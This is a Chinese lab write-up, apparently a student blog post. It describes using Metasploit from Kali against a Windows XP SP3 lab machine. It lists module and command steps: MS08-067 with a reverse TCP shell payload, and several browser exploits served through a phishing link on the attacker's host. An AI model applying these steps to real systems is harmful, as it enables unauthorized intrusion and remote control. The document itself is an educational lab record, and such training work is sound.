标签:相同 选择 targe inf xpl .com 设置 ash 提醒
1.用自己的话解释什么是exploit,payload,encode
答:exploit就是利用一些工具的,用来收集目标靶机的这种漏洞或者个人信息,并可以进行一些比如摄屏、提权等操作。
payload就是一个负载,可以负载程序或者数据等到目标靶机,实现攻击。
encode是一个加密的工具,可以加密信息或者文件。
1.靶机型号:windows XP SP3(English)
2.靶机IP:192.168.229.138
3:主机:kali
4.主机IP:192.168.229.135
1.首先要查看有哪些攻击方法,在路径 /usr/share/metasploit-framework/modules/exploit中可以看到攻击各个平台的方法,我们选择windows ,可以看到有很多适用于windows的攻击方法,但是这些攻击方法也是用于攻击不同版本的Windows的,所以我们要查找有哪些攻击 Windows XP SP3(English)的攻击方法,同时还是攻击服务器的。
2.具体的查看方法:进入msfconsole后
使用
2.1
use XXXXXXXX
例如:
use exploit/windows/smb/ms08_067_netapi.rb
2.2 查看此方法可以攻击的靶机类型show targets
这里我们可以看到我们的攻击靶机序号是7,所以接下来输入set target 7或者set target 0(set target 0是自动选择靶机)
2.3设置payload,利用show payloads列出各种payload,并且有负载的等级,从中选择一个
使用set XXXXXXXX,例如:我选择的 set payload generic/shell_reverse_tcp
3.设置RHOST、LHOST、LPORT等,利用show options查看我们所必要输入的信息。
4.利用exploit进行攻击
5.此外还尝试了几个别的攻击:
MS08-067安全漏洞
ms04_011_lsass安全漏洞(失败了)
## 针对浏览器的攻击--
1.靶机型号:windows XP SP3(English)
2.靶机IP:192.168.229.138
3:主机:kali
4.主机IP:192.168.229.135
1.如同前面的攻击方式大致相同,在 /usr/share/metasploit-framework/modules/exploits/windows/browser 查找利用浏览器漏洞进行攻击的工具,之后从中选择能应用于对应靶机的工具。
2.利用show targets查看适用范围
下面是我查看的几个攻击工具的适用范围
adobe_cooltype_sing.rb
ms11_050_mshtml_cobjectelement和mozilla_firefox_xmlserializer.rb
adobe_flash_avm2.rb和mozilla_interleaved_write.rb和mozilla_interleaved_write.rb
adobe_flash_casi32_int_overflow.rb和ms10_046_shortcut_icon_dllloader
可以看到其中的很多攻击方式都是Automatic,所以我试了几个
3.设置过程基本上差不多,但是要注意的是里面的SRVHOST和SRVPORT要设置成攻击者(自己的IP)和80端口,如果设置成别的在exploit后会提醒你如下的内容。
4.配置完毕后exploit,会显示服务器开始,此时你要切换到靶机中,输入类似图中的链接,这就是为什么我们要在SRVHOST中输入攻击者的IP,实际上是利用浏览器的漏洞创建一个URL钓鱼链接,一旦其他用户访问这个钓鱼链接,我们就可以通过漏洞进行攻击,获取靶机的权限。
5.攻击画面
利用ms10_046_shortcut_icon_dllloader进行攻击
利用adobe_cooltype_sing进行攻击(应该是失败了)
利用ms11_050_mshtml_cobjectelement进行攻击(失败了)
标签:相同 选择 targe inf xpl .com 设置 ash 提醒
原文地址:https://www.cnblogs.com/fengxingck/p/8977270.html
